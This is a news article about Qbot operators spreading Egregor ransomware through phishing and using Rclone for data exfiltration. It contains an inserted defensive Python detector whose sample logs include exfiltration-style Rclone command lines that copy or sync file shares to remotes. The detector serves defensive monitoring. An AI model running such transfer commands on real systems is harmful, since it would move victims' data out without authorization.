Qbot Trojan Incorporates Egregor Ransomware to Steal Bank Credentials from Companies Worldwide

Researchers from Singaporean threat hunting and intelligence firm Group-IB said that operators of Qbot banking Trojan started launching cyber-attacks using Egregor ransomware to steal bank credentials from international firms.


Qbot, also called QakBot or QuakBot, is a notorious banking Trojan with a keylogging component that records victims' keystrokes to capture their credentials, which are then used to commit fraud.

This Windows malware can also be used by perpetrators to obtain their victims' Windows domain credentials, allowing them to steal login data from browsers and from bank web servers.

The operators of Qbot started actively distributing the newly discovered ransomware variant called Egregor in September.

Since the launch of the Egregor operations, many companies around the world became victims of the hackers.

“In less than 3 months Egregor operators have managed to successfully hit 69 companies around the world with 32 targets in the US, 7 victims in France and Italy each, 6 in Germany, and 4 in the UK. Other victims happened to be from the APAC, Middle East, and Latin America,” said Oleg Skulkin, Senior Digital Forensics Analyst at Group-IB.

According to the Singapore-based cybersecurity firm, operators infect victims with Qbot through phishing emails carrying Excel documents disguised as DocuSign-encrypted spreadsheets.

Egregor operators then use the open-source command-line file-sync tool Rclone for data exfiltration, similar to how ProLock ransomware operations work.
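Since the article identifies Rclone as the exfiltration tool, a defender's first question is how to spot it in endpoint telemetry. The following is an added example, not code from the article or from Group-IB: it scans a handful of constructed process-creation records (a simplified `timestamp|host|image|command line` format, not real logs) and flags any execution of `rclone.exe` that pairs a transfer verb (`copy`, `sync`, `move` and their `to` variants) with an Rclone remote of the form `name:path`, while distinguishing those remotes from Windows drive paths such as `C:\Shares`. Host names, paths and remote names are invented for the sample.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation events for this example (not real telemetry).
# Format: timestamp|host|image path|command line
SAMPLE_EVENTS = r"""
2020-11-20T09:14:02Z|WS-0042|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\notes.txt
2020-11-20T09:16:55Z|WS-0042|C:\Users\alice\AppData\Local\Temp\rclone.exe|rclone.exe copy C:\Shares\Finance cloud:backup --transfers 8
2020-11-20T09:17:10Z|SRV-FILE01|C:\Tools\rclone\rclone.exe|rclone.exe sync D:\Data remote:exfil -q
2020-11-20T09:20:31Z|WS-0042|C:\Program Files\Git\bin\git.exe|git.exe clone https://example.invalid/repo.git
2020-11-20T09:25:00Z|WS-0077|C:\Tools\rclone\rclone.exe|rclone.exe lsd remote:
"""

# Rclone sub-commands that move data off the host.
TRANSFER_VERBS = {"copy", "copyto", "sync", "move", "moveto"}
REMOTE_RE = re.compile(r"^[\w.-]+:")           # Rclone remote spec, e.g. cloud:backup
DRIVE_RE = re.compile(r"^[A-Za-z]:([\\/]|$)")  # Windows drive path, e.g. C:\Shares or D:


@dataclass
class Finding:
    timestamp: str
    host: str
    severity: str            # "high": transfer to a remote; "info": rclone ran without a transfer
    verb: Optional[str]
    remote: Optional[str]


def is_remote_spec(token: str) -> bool:
    """True for an Rclone remote ("name:path"), False for a Windows drive path."""
    return bool(REMOTE_RE.match(token)) and not DRIVE_RE.match(token)


def inspect_event(line: str) -> Optional[Finding]:
    """Return a Finding if the event is an rclone.exe execution, else None."""
    ts, host, image, cmdline = line.split("|", 3)
    if image.rsplit("\\", 1)[-1].lower() != "rclone.exe":
        return None
    tokens = cmdline.split()  # the constructed sample contains no quoted arguments
    verb = next((t.lower() for t in tokens[1:] if t.lower() in TRANSFER_VERBS), None)
    remote = next((t for t in tokens[1:] if is_remote_spec(t)), None)
    if verb and remote:
        return Finding(ts, host, "high", verb, remote)
    # Any rclone execution is worth recording, even a listing such as "lsd remote:".
    return Finding(ts, host, "info", verb, remote)


def scan(events: str) -> List[Finding]:
    """Scan newline-separated events and return all rclone-related findings."""
    return [f for f in (inspect_event(l) for l in events.splitlines() if l.strip()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.timestamp} {finding.host} "
              f"verb={finding.verb} remote={finding.remote}")
```

The match is deliberately on the image file name; an operator who renames the binary would evade it, so in production this logic is best paired with a check on the executable's original file name or hash rather than its path alone.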

According to Skulkin, about 28.9 percent of the victims of the ransomware operations came from the manufacturing sector and around 14.5 percent of the attacks occurred in the retail industry.
